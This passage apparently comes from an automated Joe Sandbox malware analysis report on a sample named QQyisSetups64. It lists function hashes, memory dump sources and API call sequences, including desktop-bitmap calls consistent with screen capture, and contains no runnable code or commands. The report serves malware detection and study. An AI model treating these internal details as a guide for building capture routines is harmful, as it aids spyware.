                                                                                                                                                                                                                      • Opcode ID: 966baa02cbab0462d49951f9c363315c70f1ec3e6bd818d3c9011fc18f246283
                                                                                                                                                                                                                      • Instruction ID: 092f9db0ecb814dafe5c6d826325e783bfe5c319738a3e19fe0ad3c0906d1fc5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 966baa02cbab0462d49951f9c363315c70f1ec3e6bd818d3c9011fc18f246283
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77F06D7C400350AFC71CEFB0C94980F7BA9AF842507388468E90A8F312DB35D826CBE8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free_malloc
                                                                                                                                                                                                                      • String ID: &
                                                                                                                                                                                                                      • API String ID: 845055658-3042966939
                                                                                                                                                                                                                      • Opcode ID: 96f475fef29d70f25b531db5fbbeac76c6573e20d4e1e8de80fbd7a54519110d
                                                                                                                                                                                                                      • Instruction ID: 286067001bbd6c0abe9d4741c1f7d5c7f1c3b0a4f9b70e3fae3d6324f710250a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96f475fef29d70f25b531db5fbbeac76c6573e20d4e1e8de80fbd7a54519110d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB516275D00219AFDB08DFE4C9859EFB7F9AF48300F148159E905AB3A1D734AD05CBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset_wcsrchr
                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                      • API String ID: 1675014779-2746444292
                                                                                                                                                                                                                      • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                                                                      • Instruction ID: 12ff95f005a1066df4fe866e5970116c77f139b9c384dcc14adb3d28297db8fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 063106729402187BE724D7E49C8AFFF776CEB14710F140229FA0AAE1C0DA71A916C6E5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetDesktopWindow.USER32 ref: 0378BC8F
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetDC.USER32(00000000), ref: 0378BC9C
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: CreateCompatibleDC.GDI32(00000000), ref: 0378BCA2
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetDC.USER32(00000000), ref: 0378BCAD
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 0378BCBA
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 0378BCC2
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: ReleaseDC.USER32(00000000,00000000), ref: 0378BCD3
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetSystemMetrics.USER32(0000004C), ref: 0378BD78
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetSystemMetrics.USER32(0000004D), ref: 0378BD8D
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0378BDA6
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: SelectObject.GDI32(?,00000000), ref: 0378BDB4
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: SetStretchBltMode.GDI32(?,00000003), ref: 0378BDC0
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetSystemMetrics.USER32(0000004F), ref: 0378BDCD
                                                                                                                                                                                                                        • Part of subcall function 0378BC70: GetSystemMetrics.USER32(0000004E), ref: 0378BDE0
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378B1E1
                                                                                                                                                                                                                      • swprintf.LIBCMT ref: 0378B204
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                                                                                                                                      • String ID: %s %s
                                                                                                                                                                                                                      • API String ID: 1028806752-581060391
                                                                                                                                                                                                                      • Opcode ID: b863bea2e5efeade8d2f67afee7927c84bd6b1159235585929ed244e982f47b8
                                                                                                                                                                                                                      • Instruction ID: 29affa5b20a16e468d070317d64b8cc929562d8aabfc98b33166c5b867043aac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b863bea2e5efeade8d2f67afee7927c84bd6b1159235585929ed244e982f47b8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F721D3B6A44340ABD210FF19EC85E6FB7E8EFD9710F08062EF4895A201E7619914C7A3
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03789115
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF4E
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: __CxxThrowException@8.LIBCMT ref: 0378EF63
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF74
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03789128
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                                      • String ID: string too long
                                                                                                                                                                                                                      • API String ID: 963545896-2556327735
                                                                                                                                                                                                                      • Opcode ID: 3796e7307d16dc5702b49abc8b26dcfc8d6a0976186a2fb0c48d1bac1c528624
                                                                                                                                                                                                                      • Instruction ID: a2e3a13da5d397920c8bf00b6229536b03bb690195478382789d93b72108f60f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3796e7307d16dc5702b49abc8b26dcfc8d6a0976186a2fb0c48d1bac1c528624
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9311C875788740DBC321DF2CE804A2AB7E9ABD7621F140A6EE2D1CB742C771D804C7A4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0378941D
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0378944A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • invalid string position, xrefs: 03789445
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                                                                                      • API String ID: 3614006799-1799206989
                                                                                                                                                                                                                      • Opcode ID: 69abdce99967b7c6dece9bb8c105e8ab68e9c69c5c58a93ae55306b7bd72b2a1
                                                                                                                                                                                                                      • Instruction ID: da00d526fda226278a9cbabfddbb1d56e9d4d42a05b93ff05285e5f2ccd5f380
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69abdce99967b7c6dece9bb8c105e8ab68e9c69c5c58a93ae55306b7bd72b2a1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF014E336403106BD724FF6CD8847AAF395AF42620F150A2DE6569F9C1D771E940C3D1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __output_l.LIBCMT ref: 02886FFC
                                                                                                                                                                                                                        • Part of subcall function 028870E4: __getptd_noexit.LIBCMT ref: 028870E4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit__output_l
                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                      • API String ID: 2141734944-1255198513
                                                                                                                                                                                                                      • Opcode ID: 4ea230d637fa5764a43ecdf8be00f7d262e1573a93248e79ca2350081dd71a3f
                                                                                                                                                                                                                      • Instruction ID: 3cf38d7283005a941b4309dead69d7fdaa71fb35e15c03ac5dd3304fdab03949
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea230d637fa5764a43ecdf8be00f7d262e1573a93248e79ca2350081dd71a3f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4101877A90425D9BEF00AFA8CC00BEEBBB9FB04364F100165E924E6281E7749500CBB2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __output_l.LIBCMT ref: 0378F815
                                                                                                                                                                                                                        • Part of subcall function 0378F91B: __getptd_noexit.LIBCMT ref: 0378F91B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit__output_l
                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                      • API String ID: 2141734944-1255198513
                                                                                                                                                                                                                      • Opcode ID: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                                                                                                                                                      • Instruction ID: 14a6806214fe6cd9fc35656f661450f65cf9baf9e608938c9a95e93e9d797d07
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bc75878e19a99f8b3291bc09011d637415e77d2edc72ea821797cd9c84227ee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8001617590024DAFEF00EFA5EC05BEEBBB8EB04364F144516E924EA290D7749501DB65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __output_l.LIBCMT ref: 02C87025
                                                                                                                                                                                                                        • Part of subcall function 02C8710D: __getptd_noexit.LIBCMT ref: 02C8710D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit__output_l
                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                      • API String ID: 2141734944-1255198513
                                                                                                                                                                                                                      • Opcode ID: fd1fdc686e426d0524c4a0ace4d10a2df1a110a2837cd7d0ca9d2c171b75a8c9
                                                                                                                                                                                                                      • Instruction ID: 47e3953bf014acce93abe9a8c1e1d0ad48c387f0c91935b862ae2fa55050790d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd1fdc686e426d0524c4a0ace4d10a2df1a110a2837cd7d0ca9d2c171b75a8c9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F01847290424D9BDF00AFA4CC01BEEBBB9FB44368F108115E924B6280E775D505DFA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __output_l.LIBCMT ref: 0360F1D4
                                                                                                                                                                                                                        • Part of subcall function 0360F2DA: __getptd_noexit.LIBCMT ref: 0360F2DA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd_noexit__output_l
                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                      • API String ID: 2141734944-1255198513
                                                                                                                                                                                                                      • Opcode ID: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                                                                                                                                      • Instruction ID: b863c486642f62599d94180ca6dff757b8a1874649b41dc346d0e79c008d6bba
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4016D75E042199BDF20DFA4CC01AEEBBB8EB45364F144159E924AA2C0E7789511CBA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0378957F
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EF9B
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: __CxxThrowException@8.LIBCMT ref: 0378EFB0
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EFC1
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 037895B5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • invalid string position, xrefs: 0378957A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                                                                                      • API String ID: 1785806476-1799206989
                                                                                                                                                                                                                      • Opcode ID: 291cde847a2166e875e23dd31fb394608da02a7e970727b07259e01edf8f9f49
                                                                                                                                                                                                                      • Instruction ID: dbdcb94cb6c3eec9224ed07bd94bc763614cc72a44d9dddd2914beff3a542f86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 291cde847a2166e875e23dd31fb394608da02a7e970727b07259e01edf8f9f49
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7018F317817018FD325EB2CEC9862AB3E69BC65007280A2CE291CBB8AD7B1DC424794
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0378D1D4
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF4E
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: __CxxThrowException@8.LIBCMT ref: 0378EF63
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF74
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0378D20D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                                                                      • API String ID: 1785806476-3788999226
                                                                                                                                                                                                                      • Opcode ID: 89fcfa803484e48a5fed5e3530a479c96febc63a66aed2151680a660fd51d5a5
                                                                                                                                                                                                                      • Instruction ID: ae0246fa05a81610ee04475f5b48b6b87c1bd7c366ece0197d9a3bad4e5ca7ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89fcfa803484e48a5fed5e3530a479c96febc63a66aed2151680a660fd51d5a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F701D876A402019FD714FF6DE8A9D2E77B8E6402527D9823AEC11C3648F7B8A814C790
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03788443
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF4E
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: __CxxThrowException@8.LIBCMT ref: 0378EF63
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF74
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 0378846E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                                                                      • API String ID: 1785806476-3788999226
                                                                                                                                                                                                                      • Opcode ID: 485cfac19ba814542519c0cc62b5a253aa27867060197c97b30144b51bbf6b24
                                                                                                                                                                                                                      • Instruction ID: a46db35149802004c74519c7599deaae97779fcd984d1366180f2e8063403a55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 485cfac19ba814542519c0cc62b5a253aa27867060197c97b30144b51bbf6b24
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3901A2B26443099FCB24EFA9DC9592BB3D8EB542107584A2DE45ACB740E731F800C761
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallFrame@12Setting__getptd
                                                                                                                                                                                                                      • String ID: j
                                                                                                                                                                                                                      • API String ID: 3454690891-2137352139
                                                                                                                                                                                                                      • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                                                                      • Instruction ID: 485dd21f4a90035941cd388f95717001b6757ca0dd6209e30ca5a99883d2a0f8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5115B7D800259EBCF12EF58C5443ACBB71BF16718F1A8089E459AB682C3746991CFD2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CallFrame@12Setting__getptd
                                                                                                                                                                                                                      • String ID: j
                                                                                                                                                                                                                      • API String ID: 3454690891-2137352139
                                                                                                                                                                                                                      • Opcode ID: 90659ebcae58fcf1a05544bb40a9ab719d54a7eef93821734f71d7871a8b8079
                                                                                                                                                                                                                      • Instruction ID: b92d54330a793bc0ba35450893179b0451f578816bb19ae8a8d83c2be2b82958
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90659ebcae58fcf1a05544bb40a9ab719d54a7eef93821734f71d7871a8b8079
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3115735C00215DFDB10EF29C1447ACFBB1BB04314F1D8289D4A92F692C775AAA2CB95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 028937AF
                                                                                                                                                                                                                        • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                                                                                                                        • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 028937BD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                                                                      • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                                      • Instruction ID: 26bc4e3dbb4807e6bac4a4ae70bc7ed7504fdca6f0de0bc01433375a5566944c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72016D3C900205DBCF35AFA9C4446ACB3B6BF04315F6C88ADE448E6250DB319580DF52
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 037A010A: __getptd.LIBCMT ref: 037A0110
                                                                                                                                                                                                                        • Part of subcall function 037A010A: __getptd.LIBCMT ref: 037A0120
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A06E3
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A06F1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                                                                      • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                                      • Instruction ID: d10dfff43bb684d99e9bc54f1dec9134aff526f88f380d5e82efc43b72822041
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92014638800B05CFDF35DF69D4886ADB7B9BF84212F688E6ED0599A290DB329581CF41
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 02C932AE: __getptd.LIBCMT ref: 02C932B4
                                                                                                                                                                                                                        • Part of subcall function 02C932AE: __getptd.LIBCMT ref: 02C932C4
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C937D8
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C937E6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                                                                      • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                                      • Instruction ID: 37bc19d1e7cb43f39d98e78830ff747704ce66c7d499803f4ce4dca171da32ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB016D36801285DBCF34AF66C4486ACB3B6AF40215F5444AED4909BFA0CB35A781DF15
